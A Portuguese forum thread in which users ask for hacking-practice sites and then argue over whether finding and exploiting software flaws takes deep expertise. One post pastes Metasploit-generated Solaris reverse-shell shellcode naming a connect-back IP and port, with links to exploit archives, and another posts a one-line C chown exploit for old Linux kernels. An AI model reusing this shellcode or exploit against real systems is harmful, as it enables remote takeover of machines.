• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

fpinto

Sites de Hacking Training

35 mensagens neste tópico

alem do www.hackerskills.com algum conhece mais algum site do genero???

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

o tente-hacker.org nao existe. e nao posso fazer download no pc do meu pai.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

E ninguém fala no que é o provavelmente mais conhecido: www.hackthissite.org

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

muito obrigado, assim aqueles lammer a tentar ser hackers algum dia param de invadir computadores de senhoras idosos, e praticam num servidor proprio

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
alem do www.hackerskills.com algum conhece mais algum site do genero???

ui ui ui... e que tal um "idiots guide to child pre-neo-hackers"???

por acaso até há uma excelente area nesta comunidade que alguem criou há algum tempo atras e encheu de bons conteudos... na secção de segurança do P@P podes aprender mesmo muito sobre segurança... há quem diga que até se revela demais  :ipool:

a palavra hacker não significa o que se procupa... hacker é ser-se bom em qualquer area... resolver o problema com uma unica machada (à letra)

mas digo... saber se segurança em 3 pontos:

-domingar redes

-dominar sistemas operativos

-dominar programação

e não conheço nenhum caminho facil para qualquer destes pontos... só muitos anos de estudo intenso..

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.

Acho que percebeste mal o que ele disse. Encontrar falhas em software qualquer um encontra... Agora perceber o seu funcionamento e encontrar possíveis soluções para essas falhas nem qualquer um consegue.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa

realmente é preciso ter muita calma e sangue frio para ler coisas destas... conseguem sempre impressionar pela negativa e quando se pensava já se ter ouvido tudo

contextualizando...

estavamos a falar de que? testes de qualidade? bugs do tipo, deveria dar um resultado de 10 e dá 100? ou estamos a falar de segurança informática?

baralha.se mesmo muita coisa

tendo em conta que estavamos a falar de segurança informática (que é muito mais que descobrir vulnerabilidades e aplicar exploits. era disto que falavas com as falhas de software?) e dando como referencia os conteudos de certificações como  o CEH (Certified ethical hacker) é clara a afirmação que fiz... ser-se especialista de seg. inf. (uma especialização no ramo de informática) é dominar tudo nas TI... nunca se sabe o que está no alvo, que técnica vamos ter de usar, que SO crakar, que equipamento de rede ou protocolo é preciso manipular, que programa exploitar e com que linguagem... enfim... só que não se sabe do que se fala pode afirmar o que afirmou

até para simples sniff de rede é preciso conhecer bem redes e protocolos

nota-se o fenomeno de "ler um ou outro artigo por ai e pensar que se domina algo"

e sobre as tais falhas. (antes demais, o que é ter 2 dedos de testa? é fazer-se certas afirmações? h3h3h3h3 não sou crente)

XSS - dominar tecnologias de programação web

SQL Injection - dominar tecnologias de programação web e SQL no geral

Overruns, overflows e afins - ser-se mais que um mestre, dominio completo de aquitecturas de computadores, SOs e programação no seu prisma mais hard (para mim quem mexe aqui é um autentico heroi, só não dá valor quem nunca fez nada disto)

já viste algum exploit e respectiva analise da vulnerabilidade? e agora diz-me... conheces alguem ou já falaste com alguem que têm estas capacidades? não sabes mesmo do que estas a falar

diz-me que conhecimentos necessitas para entender isto... nem te pergunto para descobrir e criar

http://www.milw0rm.com/exploits/7132'>http://www.milw0rm.com/exploits/7132

http://downloads.securityfocus.com/vulnerabilities/exploits/wmf_exp.c

# solaris_sparc_reverse -  LHOST=66.240.213.81 LPORT=4321 Size=196 Encoder=Sparc http://metasploit.com
my $shellcode =
"\x23\x3a\x59\xac\xa2\x14\x62\xe5\x20\xbf\xff\xff\x20\xbf\xff\xff".
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\xea\x23\xe0\x20".
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x9e\x03\xe0\x04".
"\x75\x4d\x12\xe2\x1d\x82\x72\xed\x8b\xb8\xb2\xe6\x27\xa7\xf2\xf3".
"\xd5\xc7\xd3\x01\x49\xf8\x33\x07\xeb\xe8\x13\xe1\x7d\xd8\x73\xe5".
"\xad\xfb\xcc\x0d\xd9\xec\x13\xee\x70\x1c\x73\xf9\xe0\xbe\xd3\xf8".
"\x8a\xaf\x33\xc4\x1b\x1f\x14\x30\x0e\x20\xab\xbc\xff\x5c\xeb\xc4".
"\xde\x63\x14\xb0\x80\x77\x34\x59\xe3\x67\x89\xac\x41\x93\x90\x9f".
"\x65\xa7\xec\xef\xf7\xfb\xb3\x1f\x63\xeb\x93\x0f\x0e\x1b\xf3\xc4".
"\x9f\xcb\xd4\x12\x0b\xf6\xd4\x29\x15\x0d\x0c\xb7\xf5\x06\x8d\xa9".
"\xd6\x2d\x12\xef\x88\x11\x0b\x1f\x3a\x75\xeb\x17\xda\x42\x54\xd7".
"\xca\x96\x14\xef\x2a\xfa\xd4\xf3\x28\xed\x0b\x30\xbc\xdd\x6b\x4e".
"\xbe\xdd\x6b\x4e";

como é obvio... TODO O MUNDO DOMINA ISTO.... h3h3h3h3h3h3h3h3h3h33h3h3h3h3h3h3h3h33h3h3h

e só mostrei o shellcode porque mostrar como se descobrem vulnerabilidade nem num livro completo.

para explorar:

http://www.metasploit.com/

http://www.milw0rm.com/

teckV  - on the run

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Não precisas de dominar redes, arquitecturas de SOs e programação para encontrares falhas em softwares p.e., basta teres dois dedos de testa.

Estás super bem... ENGANADO!

Sim é verdade, precisas de pelo menos dois dedos de testa, mas bem preenchidos com Redes...

Vê só o exemplo acima dado pelo "herakty".

E em muitos casos isto não é nada!

Não se faz assim as três pancadas, precisas de "fritar muito neurónio"...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Lol, vocês sabem ler? Eu disse detectar falhas, não disse explorá-las. Mas enfim.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Lol, vocês sabem ler? Eu disse detectar falhas, não disse explorá-las. Mas enfim.

Sites de Hacking Training - mas não é este o topico em que estamos a falar? e hacking é detectar falhas?

já agora apresento uma definição de hacker muito interessante que vi na apresentação do evento FRHACK

International IT Security Conference

Hacker

1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary. RFC1392, the Internet Users' Glossary, usefully amplifies this as: A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular.

2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.

3. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Sites de Hacking Training - mas não é este o topico em que estamos a falar? e hacking é detectar falhas?

Ora ai está, foi exactamente o que eu entendi também.

Uma coisa é Hacking e outra é apenas a detecção de falhas...

Se te referes apenas a detecção de falhas, sim é bem mais fácil que Hacking...

Mas mesmo assim em alguns casos é complicado.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
Se te referes apenas a detecção de falhas, sim é bem mais fácil que Hacking...

Mas mesmo assim em alguns casos é complicado.

estou contigo... e repara-se que há pessoas que confundem "exploitation" com detecção de falhas... onde eu trabalho é o dep. de qualidade, com pessoas não especializadas, que detectam falhas/bugs

agora... há algo completamente diferente que é "exploitation"... muito poucas falhas são passiveis de exploitation... e essas só estão ao nivel de QUEM DOMINA

ex:

XSS

SQL-Injection

Buffer overflows

Buffer-overruns

e nestas só quem DOMINA programação e muitas delas tambem redes... em ambientes WEB é quase sempre necessário conhecimentos de redes

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

e só mostrei o shellcode porque mostrar como se descobrem vulnerabilidade nem num livro completo.

descobrir vulnerabilidades pode ser tao facil como exploita-las, de qualquer modo o que o outro diz é verdade, só precisas de 2 dedos de testa.

pra hackar merdas nem 2 dedos de testa precisas...

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites
pra hackar merdas nem 2 dedos de testa precisas...

antes demais estas afirmações são uma ofensa e uma falta de respeito para quem realmente mexe nessa area... a sério

depois mostra que quem escreve isso não faz a minima ideia do que está a falar, o que sinceramente acho estranho... o que levara alguem a opiniar sobre algo que não têm a minima ideia?

diz me uma coisa... quando dizes isto "pra hackar merdas " estás a falar concretamento do quê?

é que estavamos a falar de exploits e não de hacks. hack é algo muito bem feito, aquela linha de código que resolve maravilhosamente e com beleza o problema

mas a nivel de black hat quando dizes "pra hackar merdas " falas do quê concretamente?

é que eu ha muito tempo que lido nessa area e tenho lidado com tanta vertente e vector que fico parvo quando alguem fala assim...

portantos quando dizes "hackar cenas" refereste a??

2º pergunta... se é tão simples podes mostrar um exemplo pratico e concreto? basta mostrares as questões técnias que eu vou entendelas...

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

aguardo ansiosamente, é que ainda nunca encontrei alguem no mundo que achasse isso... estou ansioso por te conhecer que és um fenomeno :P

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

antes demais estas afirmações são uma ofensa e uma falta de respeito para quem realmente mexe nessa area... a sério

depois mostra que quem escreve isso não faz a minima ideia do que está a falar, o que sinceramente acho estranho... o que levara alguem a opiniar sobre algo que não têm a minima ideia?

diz me uma coisa... quando dizes isto "pra hackar merdas " estás a falar concretamento do quê?

é que estavamos a falar de exploits e não de hacks. hack é algo muito bem feito, aquela linha de código que resolve maravilhosamente e com beleza o problema

mas a nivel de black hat quando dizes "pra hackar merdas " falas do quê concretamente?

é que eu ha muito tempo que lido nessa area e tenho lidado com tanta vertente e vector que fico parvo quando alguem fala assim...

portantos quando dizes "hackar cenas" refereste a??

2º pergunta... se é tão simples podes mostrar um exemplo pratico e concreto? basta mostrares as questões técnias que eu vou entendelas...

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

aguardo ansiosamente, é que ainda nunca encontrei alguem no mundo que achasse isso... estou ansioso por te conhecer que és um fenomeno :P

teckV

rotfl, fazer um exploit para o directshow ? WOW. BRUTAL, CLIENT SIDE VULNS NO IE! BRUTAL ! !!!!!! FODIDISSIMO! aposto que nem enxergas qual é o clsid :D= rotfl :thumbsup:

quanto a hackar merdas, bom, pode ser muita coisa...mas la está, pra hackar merdas não é preciso necessáriamente fazer exploits :P nem sequer saber como funcionam....podes chamar-lhes script kiddies, se quiseres. lol

queres exploits meus ? deves estar enganado em relação a quem os estas a pedir :P

mas como fui tão bem sucedido em irritar-te, fica aqui um pra linux abaixo do 2.6.7, só pra gozar com a tua cara:

int main(int argc,char **argv){return chown(argv[1],-1,atoi(argv[2]));}

ui...fdx, ainda estou a suar de ter escrito a linha acima....escrever exploits é dificilimo!

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

mostra-me o exploit feito por ti... pode ser para esta cena brutal do DitectShow. gosto particularmente dele :confused: se é que me entendes, o que duvido pela forma como falas (se quiseres eu apresnto-te as minhas ver~soes... como sabes este mundo funciona numa base de troca)

e já agora, se achas isto do directshow assim tão brutal, és capaz de não estar a acompanhar as vulns do IE assim à tanto tempo quanto dizes :P

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

zepreto, podias controlar-te pelo menos na linguagem, sff? Isto não é o café onde mandas as postas de pescada que bem te apetece e da forma como te apetece. Argumenta, responde mas mantém o nível, sff.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora